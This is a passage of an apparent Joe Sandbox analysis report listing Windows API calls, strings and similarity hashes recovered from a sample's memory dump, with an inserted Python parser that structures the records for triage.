                                                    • Opcode Fuzzy Hash: b3558ccd96e3258de81afc88d922231016bd7a00bd2f69be2f5444d61d6baa05
                                                    • Instruction Fuzzy Hash: 4A115131714B408FE7719B25EA88B6B7B95BF72324F04591EE08386771C768EC85D750
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • WaitForSingleObject.KERNEL32(00000000,?,D13B3340,?,?,00000000,00548480,000000FF,00000000,004B1A08,00000000,8000000B,?,?,?,?), ref: 004B1A57
                                                    • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000,00548480,000000FF,00000000,004B1A08,00000000,8000000B,?,?,?,?,80004005), ref: 004B1A71
                                                    • TerminateThread.KERNEL32(00000000,00000000,?,?,00000000,00548480,000000FF,00000000,004B1A08,00000000,8000000B,?,?,?,?,80004005), ref: 004B1A89
                                                    • CloseHandle.KERNEL32(00000000,?,?,00000000,00548480,000000FF,00000000,004B1A08,00000000,8000000B,?,?,?,?,80004005,D13B3340), ref: 004B1A92
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Thread$CloseCodeExitHandleObjectSingleTerminateWait
                                                    • String ID:
                                                    • API String ID: 3774109050-0
                                                    • Opcode ID: 0faac58dcdaca3be46087adee259cfe11305163a07c5e1a924780a1d70109a7e
                                                    • Instruction ID: 6b92f5ed398e5b18bef2ada9d7d3e1963aaf9c064e9c29b3c4d800f760cf5465
                                                    • Opcode Fuzzy Hash: 0faac58dcdaca3be46087adee259cfe11305163a07c5e1a924780a1d70109a7e
                                                    • Instruction Fuzzy Hash: 38019E31900706EFCB208F54DC08BBBBBF8FB09714F00462AE826926A0DB74AC04CB64
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • PathIsUNCW.SHLWAPI(?,D13B3340), ref: 0045EB51
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Path
                                                    • String ID: \\?\$\\?\UNC\
                                                    • API String ID: 2875597873-3019864461
                                                    • Opcode ID: 7e80ca4f7048ba2d5b5078be45939f1da07ca7d6b952b001fe84096bd11754e9
                                                    • Instruction ID: cbc72a4a681af93f4a13f22b08d9302c5874a36143002c17ccfc921ab417ab80
                                                    • Opcode Fuzzy Hash: 7e80ca4f7048ba2d5b5078be45939f1da07ca7d6b952b001fe84096bd11754e9
                                                    • Instruction Fuzzy Hash: 3B51F370D006049BDB18CF69D985BAEF7F5FF85305F10861EE80267282EB756A48CBE4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • OpenEventW.KERNEL32(00000000,00000000,D13B3340,_pbl_evt,00000008,?,?,005CB480,00000001,D13B3340,00000000), ref: 004C264E
                                                    • CreateEventW.KERNEL32(00000000,00000001,00000001,?), ref: 004C266B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Event$CreateOpen
                                                    • String ID: _pbl_evt
                                                    • API String ID: 2335040897-4023232351
                                                    • Opcode ID: c6b2f3b2cb7cbb4eb1cfb16a04e2ea67527262628c1a5c03955f743eed8ba27b
                                                    • Instruction ID: 478ccf32b0df5e62135902498820cdfe1d6ab1f003fc300284000a8482277483
                                                    • Opcode Fuzzy Hash: c6b2f3b2cb7cbb4eb1cfb16a04e2ea67527262628c1a5c03955f743eed8ba27b
                                                    • Instruction Fuzzy Hash: 4A517F71D10608EFDB10DF68CD46BAEB7B8FB15710F10826AE911B72D0DBB46A04CBA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetTempPathW.KERNEL32(00000104,?,D13B3340,?,?,006394D0), ref: 004A08AF
                                                    • CreateDirectoryW.KERNEL32(?,00000000,?,006394D0), ref: 004A0910
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CreateDirectoryPathTemp
                                                    • String ID: ADVINST_LOGS
                                                    • API String ID: 2885754953-2492584244
                                                    • Opcode ID: 38e0da864187b552482e4515115df60c59fd1c89980fc916bb39f9b271a3394c
                                                    • Instruction ID: 94346d478a78fd6998a7a6ca8fc65a1a442f8e5514c8b6ce30d72c510614a1a7
                                                    • Opcode Fuzzy Hash: 38e0da864187b552482e4515115df60c59fd1c89980fc916bb39f9b271a3394c
                                                    • Instruction Fuzzy Hash: 5F51B1B5940219CADB309F28C8447BBB3F8FF26714F1446AFD84997291EB385D85CB98
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 0053820D: RtlFreeHeap.NTDLL(00000000,00000000,?,0053A1A9,00000000,00535FF3,00000000,?,00529D85,00000000,00535FF3,?,?,?,?,00535DED), ref: 00538223
                                                      • Part of subcall function 0053820D: GetLastError.KERNEL32(?,?,0053A1A9,00000000,00535FF3,00000000,?,00529D85,00000000,00535FF3,?,?,?,?,00535DED), ref: 0053822E
                                                    • ___free_lconv_mon.LIBCMT ref: 005416C0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ErrorFreeHeapLast___free_lconv_mon
                                                    • String ID: XBc$p@c
                                                    • API String ID: 4068849827-1312289162
                                                    • Opcode ID: c030ce43f277580a0ac82325dd2775de73cfd1e897d8aab6ac347db4e9913d11
                                                    • Instruction ID: 38913ea962d5f35231c7a9dc864b717022b31a18f143001ab65a1c08c2e3a671
                                                    • Opcode Fuzzy Hash: c030ce43f277580a0ac82325dd2775de73cfd1e897d8aab6ac347db4e9913d11
                                                    • Instruction Fuzzy Hash: 0B314A71600B019FEB25AA78DC49FAA7FE9FF40354F254529F065D7191DF31E8808B58
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
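
The per-function records above (imported API calls with their call-site addresses, "Part of subcall function" entries, the memory dump they were recovered from, and the Opcode/Instruction IDs Joe Sandbox uses for similarity matching) are easier to triage in bulk once parsed into structured data. The Python parser below is an added example and not Joe Sandbox code; its SAMPLE is constructed from the registry-query record and the ADVINST_LOGS record on this page, trimmed of the memory-dump and instruction-hash lines, and the layout it assumes (an "APIs" header opening each record, bullet lines for calls and ID fields, a trailing Uniqueness Score) is only what is visible here.

```python
"""Parse the per-function API records of a Joe Sandbox report into structured data.
Added example, not Joe Sandbox code; SAMPLE is constructed from two records on this
page, trimmed of the memory-dump and instruction-hash lines."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set

SAMPLE = """\
APIs
• RegCloseKey.ADVAPI32(00000000,D13B3340), ref: 0049D686
• _wcsrchr.LIBVCRUNTIME ref: 0049D6B0
• RegQueryValueExW.ADVAPI32(00000000,D13B3340,00000000,00000000,00000000,00000000,D13B3340,00000001,?,00000000,00000000), ref: 0049D733
• RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0049D77F
  • Part of subcall function 0049D530: RegOpenKeyExW.ADVAPI32(00000000,D13B3340,00000000,00020019,00000002,D13B3340,00000001,00000010,00000002,0049C85C,D13B3340,00000000,00000000), ref: 0049D5CC
Similarity
• API ID: Close$OpenQueryValue_wcsrchr
• String ID:
• API String ID: 213811329-0
• Opcode ID: 3455896e0d359e34675ac1ef1d8ecf7f9a2c2d154765430ee20f41d5e22adcbd
• Opcode Fuzzy Hash: 3455896e0d359e34675ac1ef1d8ecf7f9a2c2d154765430ee20f41d5e22adcbd
Uniqueness Score: -1.00%
APIs
• GetTempPathW.KERNEL32(00000104,?,D13B3340,?,?,006394D0), ref: 004A08AF
• CreateDirectoryW.KERNEL32(?,00000000,?,006394D0), ref: 004A0910
Strings
Similarity
• API ID: CreateDirectoryPathTemp
• String ID: ADVINST_LOGS
• API String ID: 2885754953-2492584244
• Opcode ID: 38e0da864187b552482e4515115df60c59fd1c89980fc916bb39f9b271a3394c
• Opcode Fuzzy Hash: 38e0da864187b552482e4515115df60c59fd1c89980fc916bb39f9b271a3394c
Uniqueness Score: -1.00%
"""

# One call line: optional "Part of subcall function XXXXXXXX:" prefix, Name.MODULE,
# optional (args), then "ref: <call-site address>"; Strings entries never match.
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[A-Za-z_][\w:]*)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
FIELD_RE = re.compile(  # bullet "Key: value" metadata lines worth keeping
    r"^\s*•\s*(?P<key>API ID|String ID|API String ID|Opcode ID|Instruction ID|"
    r"Opcode Fuzzy Hash|Instruction Fuzzy Hash|Source File):\s*(?P<val>.*?)\s*$"
)
SCORE_RE = re.compile(r"^\s*Uniqueness Score:\s*(?P<score>-?\d+(?:\.\d+)?)%\s*$")

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str                          # call-site address inside the dumped image
    subcall_of: Optional[str] = None  # set for "Part of subcall function" entries

@dataclass
class FunctionBlock:
    calls: List[ApiCall] = field(default_factory=list)
    fields: Dict[str, str] = field(default_factory=dict)
    uniqueness: Optional[float] = None

def parse_blocks(text: str) -> List[FunctionBlock]:
    """Split the listing at each 'APIs' header and parse the record that follows it."""
    blocks: List[FunctionBlock] = []
    cur: Optional[FunctionBlock] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = FunctionBlock()
            blocks.append(cur)
            continue
        if cur is None:  # tail of a record whose header lies above the text we were given
            continue
        m = CALL_RE.match(line)
        if m:
            args = [a for a in (m.group("args") or "").split(",") if a]
            cur.calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"]))
            continue
        m = FIELD_RE.match(line)
        if m:
            cur.fields[m["key"]] = m["val"]
            continue
        m = SCORE_RE.match(line)
        if m:
            cur.uniqueness = float(m["score"])
    return blocks

def blocks_calling(blocks: List[FunctionBlock], names: Set[str]) -> List[str]:
    """Opcode IDs of records whose direct calls (subcalls excluded) cover all names."""
    return [b.fields.get("Opcode ID", "") for b in blocks
            if names <= {c.name for c in b.calls if c.subcall_of is None}]

def opcode_hash_consistent(block: FunctionBlock) -> bool:
    """Every record on this page repeats Opcode ID as Opcode Fuzzy Hash; flag any that differ."""
    return block.fields.get("Opcode ID") == block.fields.get("Opcode Fuzzy Hash")

if __name__ == "__main__":
    for b in parse_blocks(SAMPLE):
        print(b.fields.get("String ID"), sorted({c.module for c in b.calls}),
              [(c.name, c.ref) for c in b.calls])
```

Subcall entries are kept but tagged with the parent function address rather than counted as the record's own imports, so a query for `RegOpenKeyExW` returns nothing here even though the registry record reaches it through function 0049D530; when hunting for a specific API sequence (for example GetTempPathW followed by CreateDirectoryW) that distinction matters for matching against other reports.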

                                                    APIs
                                                    • FormatMessageW.KERNEL32(000013FF,00000000,?,00000000,00000000,00000000,00000000,D13B3340,005CA7FC), ref: 004750AC
                                                    • LocalFree.KERNEL32(00000000,00000000,-00000002), ref: 004751A3
                                                      • Part of subcall function 004649B0: std::locale::_Init.LIBCPMT ref: 00464A8D
                                                      • Part of subcall function 00462440: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00462515
                                                    Strings
                                                    • Failed to get Windows error message [win32 error 0x, xrefs: 004750CA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: FormatFreeInitIos_base_dtorLocalMessagestd::ios_base::_std::locale::_
                                                    • String ID: Failed to get Windows error message [win32 error 0x
                                                    • API String ID: 1983821583-3373098694
                                                    • Opcode ID: 97d337acd6bf913d375403c357f28ebea9ff60ac234480a0ef9ea8de5bface55
                                                    • Instruction ID: f8cacb592408c299a4bb0cca95c8000c1866764582413eb032b9bf9ec64f2f93
                                                    • Opcode Fuzzy Hash: 97d337acd6bf913d375403c357f28ebea9ff60ac234480a0ef9ea8de5bface55
                                                    • Instruction Fuzzy Hash: 9041B370E007089BDB10DF58CD46BAFBBF8FF40314F248159E504AB291EBB49A48CB96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • InterlockedPushEntrySList.KERNEL32(00638A70,00638B18,Windows.UI.Xaml.Controls.TextBlock,00000022,D13B3340,00639310,000000C4,?,00638B14,Function_001F8977,000000FF), ref: 0039E668
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: EntryInterlockedListPush
                                                    • String ID: P9$Windows.UI.Xaml.Controls.TextBlock
                                                    • API String ID: 4129690577-962723295
                                                    • Opcode ID: 74bf334a2089f1307f36ec94f0c33ad609f9ec8e11a4ef852140c1a7df5bbe26
                                                    • Instruction ID: 0ce58be1ea2065a5a0941b8fe20c8c1083406433f8480ab7c51e58cc967131a5
                                                    • Opcode Fuzzy Hash: 74bf334a2089f1307f36ec94f0c33ad609f9ec8e11a4ef852140c1a7df5bbe26
                                                    • Instruction Fuzzy Hash: B9316BB1A0121ADFDB01DF94C845BEEFBB4FF14715F104129E8116B290DBB56A08CBE1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • IsWindow.USER32(00000002), ref: 0036392B
                                                    • IsWindow.USER32(00000002), ref: 00363942
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Window
                                                    • String ID: 0[[
                                                    • API String ID: 2353593579-2128359521
                                                    • Opcode ID: 63a6d579a9ee785529bd9d48f1bb4ed647672488a7adb37cd095b0bbfbece5d4
                                                    • Instruction ID: 6f807d5f75b48f7d66b98ed60028dd75887c13f39a6b4bafd9eaf6727143b428
                                                    • Opcode Fuzzy Hash: 63a6d579a9ee785529bd9d48f1bb4ed647672488a7adb37cd095b0bbfbece5d4
                                                    • Instruction Fuzzy Hash: 23217A716007059FDB29DF65D855B6BBBF5FF04B20F00CA2CE46A8B6A0CB31A904CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0039575B
                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 003957BE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                    • String ID: bad locale name
                                                    • API String ID: 3988782225-1405518554
                                                    • Opcode ID: 213ae38b8dd237caaa8471dd88203d9dd18ead522d7dafa81a1f8fb924908408
                                                    • Instruction ID: a0fbbbd02f15aa512ee1fc72d9f87cb9b4137cfd1a53719e401d62b4806a3ffc
                                                    • Opcode Fuzzy Hash: 213ae38b8dd237caaa8471dd88203d9dd18ead522d7dafa81a1f8fb924908408
                                                    • Instruction Fuzzy Hash: 3E21F170A05B84DFDB21CF68C90478ABFF4BF15700F14869DE48987781D7B5AA04CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetLastError.KERNEL32(0062E920,0000000C,0062E900,00000008), ref: 00529B31
                                                    • ExitThread.KERNEL32 ref: 00529B38
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ErrorExitLastThread
                                                    • String ID: `{5
                                                    • API String ID: 1611280651-770602540
                                                    • Opcode ID: b5dca881f08fd864e31158602f07e76ecee259caf4ac6359d918184de82cd9a4
                                                    • Instruction ID: 0860ff9aa95129a70f494fff33b2c2ebadaa29d433857325904d5757da7896f2
                                                    • Opcode Fuzzy Hash: b5dca881f08fd864e31158602f07e76ecee259caf4ac6359d918184de82cd9a4
                                                    • Instruction Fuzzy Hash: A411CE75E04A29AFCB01ABB0E80EB6E7F20FF82710F100249F401572E2DB706A049B91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • VirtualQuery.KERNEL32(80000000,0051D1C8,0000001C,0051D3BD,00000000,?,?,?,?,?,?,?,0051D1C8,00000004,006378D4,0051D44D), ref: 0051D294
                                                    • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0051D1C8,00000004,006378D4,0051D44D), ref: 0051D2AF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: InfoQuerySystemVirtual
                                                    • String ID: D
                                                    • API String ID: 401686933-2746444292
                                                    • Opcode ID: 54ef9924145364e43ab06d6db65114d23be6b4cb48631fa2cf013054f9dbcedc
                                                    • Instruction ID: cc11f1cf6960c75e92b4fd46d0d6466904916de86e194e326209e6efe2709128
                                                    • Opcode Fuzzy Hash: 54ef9924145364e43ab06d6db65114d23be6b4cb48631fa2cf013054f9dbcedc
                                                    • Instruction Fuzzy Hash: CD01F776A001096BDB14DE69DC05BED7BBAFFC4324F0CC120ED29D7240DA38D946C690
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Strings
                                                    • 4Vc, xrefs: 0036328D
                                                    • C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp, xrefs: 00363252
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ActiveWindow
                                                    • String ID: 4Vc$C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp
                                                    • API String ID: 2558294473-343011873
                                                    • Opcode ID: c63248a2ae9ee8fd1cb96457316ae664a0011d0b154b5a847c35cadceace45bc
                                                    • Instruction ID: 2e4589a3cb2018683f7227a83dd177da10d9f48c3064892b0c2000851b73b2eb
                                                    • Opcode Fuzzy Hash: c63248a2ae9ee8fd1cb96457316ae664a0011d0b154b5a847c35cadceace45bc
                                                    • Instruction Fuzzy Hash: 8A117930D05298DFCF05DBE4CD54B9DBBB5BF55308F508098D002AB295EBB46E08CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Strings
                                                    • 4Vc, xrefs: 003635FE
                                                    • C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp, xrefs: 003635C3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ActiveWindow
                                                    • String ID: 4Vc$C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp
                                                    • API String ID: 2558294473-343011873
                                                    • Opcode ID: 57c571ab13d54a1c6c2a209b7206ebd28e883f0043991129a35fcdd0f23e1b0c
                                                    • Instruction ID: 8a047e9de26fe199e2e2b53395d893a03701a7a2217e71c3bca2a3d9b01f41ba
                                                    • Opcode Fuzzy Hash: 57c571ab13d54a1c6c2a209b7206ebd28e883f0043991129a35fcdd0f23e1b0c
                                                    • Instruction Fuzzy Hash: E7117934D05298EFCB05DBE4CE54ADDBBB5BF55308F50809CD001AB296DBB46A08CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Strings
                                                    • 4Vc, xrefs: 0036331D
                                                    • C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp, xrefs: 003632E0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
